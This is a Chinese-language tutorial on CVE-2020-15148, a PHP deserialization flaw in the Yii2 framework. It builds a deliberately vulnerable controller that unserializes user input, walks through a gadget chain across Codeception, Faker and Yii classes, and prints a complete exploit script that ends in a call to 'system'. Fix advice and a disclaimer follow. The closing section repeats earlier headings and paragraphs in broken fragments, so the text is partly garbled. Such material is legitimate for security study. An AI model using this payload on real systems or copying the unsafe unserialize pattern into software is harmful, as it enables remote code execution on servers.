Yii2框架反序列化漏洞分析与利用教学<\/h1>

1. 漏洞概述<\/h2>
CVE-2020-15148是Yii2框架中的一个反序列化漏洞，攻击者可以通过精心构造的序列化数据实现任意代码执行。该漏洞与Laravel框架的反序列化漏洞有相似之处，都利用了PHP的可变函数特性。<\/p>

2. 前置知识<\/h2>

2.1 Yii2框架基础<\/h3>

Yii2是一个MVC框架，主要特点包括：<\/p>

控制器方法以action<\/code>为前缀<\/li>
默认使用r<\/code>参数表示路由（如\/index.php?r=post\/view&id=100<\/code>）<\/li>

支持URL美化<\/li>
<\/ul>
2.2 PHP可变函数<\/h3>
PHP允许将数组作为函数调用，形式为：<\/p>
$func =<\/span> array<\/span>("ClassName"<\/span>, "methodName"<\/span>);
<\/span><\/span>$func(); \/\/ 等同于ClassName::methodName()
<\/span><\/span><\/span><\/span>
<\/span><\/span>$func =<\/span> array<\/span>(new<\/span> ClassName<\/span>, "methodName"<\/span>);
<\/span><\/span>$func(); \/\/ 等同于$obj->methodName()
<\/span><\/span><\/span><\/code><\/pre>3. 漏洞环境搭建<\/h2>

下载Yii2框架源码<\/li>
创建测试控制器HelloController<\/code>：<\/li>
<\/ol>
namespace<\/span> app\controllers<\/span>;
<\/span><\/span>
<\/span><\/span>use<\/span> Yii<\/span>;
<\/span><\/span>use<\/span> yii\web\Controller<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> HelloController<\/span> extends<\/span> Controller<\/span> {
<\/span><\/span>    function<\/span> actionTest<\/span>() {
<\/span><\/span>        $name =<\/span> Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>get<\/span>('unserialize'<\/span>);
<\/span><\/span>        return<\/span> unserialize<\/span>(base64_decode<\/span>($name));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
通过URL访问：\/index.php?r=hello\/test&unserialize=[恶意payload]<\/code><\/li>
<\/ol>
4. 漏洞利用链分析<\/h2>
4.1 利用链组成<\/h3>
完整的利用链涉及以下类：<\/p>

Codeception\Extension\RunProcess<\/strong> - 反序列化入口点，触发__destruct<\/code><\/li>
Faker\Generator<\/strong> - 通过__call<\/code>魔术方法实现方法调用<\/li>
yii\log\DbTarget<\/strong> - 提供可控的export<\/code>方法调用<\/li>
Codeception\Util\XmlBuilder<\/strong> - 辅助类<\/li>
<\/ol>
4.2 关键点<\/h3>

利用RunProcess<\/code>的__destruct<\/code>方法触发链式调用<\/li>
通过Generator<\/code>的__call<\/code>方法实现任意方法调用<\/li>
使用DbTarget<\/code>的export<\/code>方法作为跳板<\/li>
最终通过可变函数实现任意代码执行<\/li>
<\/ol>
5. 漏洞利用EXP构造<\/h2>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ misc
<\/span><\/span><\/span><\/span>namespace<\/span> Codeception\Util<\/span>;
<\/span><\/span>class<\/span> XmlBuilder<\/span> {
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>__dom__<\/span> =<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ poc
<\/span><\/span><\/span><\/span>namespace<\/span> yii\log<\/span>;
<\/span><\/span>class<\/span> DbTarget<\/span> {
<\/span><\/span>    public<\/span> $logTable;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ __call
<\/span><\/span><\/span><\/span>namespace<\/span> Faker<\/span>;
<\/span><\/span>class<\/span> Generator<\/span> {
<\/span><\/span>    public<\/span> $formatters;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ __destruct
<\/span><\/span><\/span><\/span>namespace<\/span> Codeception\Extension<\/span>;
<\/span><\/span>use<\/span> Codeception\Util\XmlBuilder<\/span>;
<\/span><\/span>use<\/span> Faker\Generator<\/span>;
<\/span><\/span>use<\/span> yii\log\DbTarget<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> RunProcess<\/span> {
<\/span><\/span>    public<\/span> $processes;
<\/span><\/span>    public<\/span> $output;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$g2 =<\/span> new<\/span> Generator<\/span>();
<\/span><\/span>$g2-><\/span>formatters<\/span> =<\/span> [
<\/span><\/span>    'quoteTableName'<\/span> =><\/span> 'system'<\/span>,
<\/span><\/span>    'getTransaction'<\/span> =><\/span> [new<\/span> XmlBuilder<\/span>(), 'getDom'<\/span>]
<\/span><\/span>];
<\/span><\/span>
<\/span><\/span>$col =<\/span> new<\/span> DbTarget<\/span>();
<\/span><\/span>$col-><\/span>db<\/span> =<\/span> $g2;
<\/span><\/span>$col-><\/span>logTable<\/span> =<\/span> 'dir'<\/span>;
<\/span><\/span>
<\/span><\/span>$g1 =<\/span> new<\/span> Generator<\/span>();
<\/span><\/span>$g1-><\/span>formatters<\/span> =<\/span> [
<\/span><\/span>    'isRunning'<\/span> =><\/span> [$col, 'export'<\/span>]
<\/span><\/span>];
<\/span><\/span>
<\/span><\/span>$run_process =<\/span> new<\/span> RunProcess<\/span>();
<\/span><\/span>$run_process-><\/span>processes<\/span> =<\/span> [$g1];
<\/span><\/span>
<\/span><\/span>echo<\/span> base64_encode<\/span>(serialize<\/span>($run_process));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>6. 漏洞修复建议<\/h2>

避免直接反序列化用户输入<\/li>
使用白名单限制可反序列化的类<\/li>
更新到Yii2的最新版本<\/li>
<\/ol>
7. 扩展思考<\/h2>

该漏洞利用方式与Laravel反序列化漏洞的相似之处<\/li>
PHP可变函数在漏洞利用中的多种应用场景<\/li>
如何通过代码审计发现类似的反序列化漏洞<\/li>
<\/ol>
8. 参考资源<\/h2>

Yii2官方文档<\/li>
PHP可变函数官方文档<\/li>
CVE-2020-15148漏洞报告<\/li>
先知社区相关分析文章<\/li>
<\/ol>
通过本教学，您应该已经掌握了Yii2框架反序列化漏洞的原理、利用方法及防御措施。在实际应用中，请务必遵守法律法规，仅在授权环境下进行安全测试。<\/p>

Yii2框架反序列化漏洞分析与利用教学<\/h1>

1. 漏洞概述<\/h2> CVE-2020-15148是Yii2框架中的一个反序列化漏洞，攻击者可以通过精心构造的序列化数据实现任意代码执行。该漏洞与Laravel框架的反序列化漏洞有相似之处，都利用了PHP的可变函数特性。<\/p>

2. 前置知识<\/h2>

4. 漏洞利用链分析<\/h2>

1. 漏洞概述<\/h2>
CVE-2020-15148是Yii2框架中的一个反序列化漏洞，攻击者可以通过精心构造的序列化数据实现任意代码执行。该漏洞与Laravel框架的反序列化漏洞有相似之处，都利用了PHP的可变函数特性。<\/p>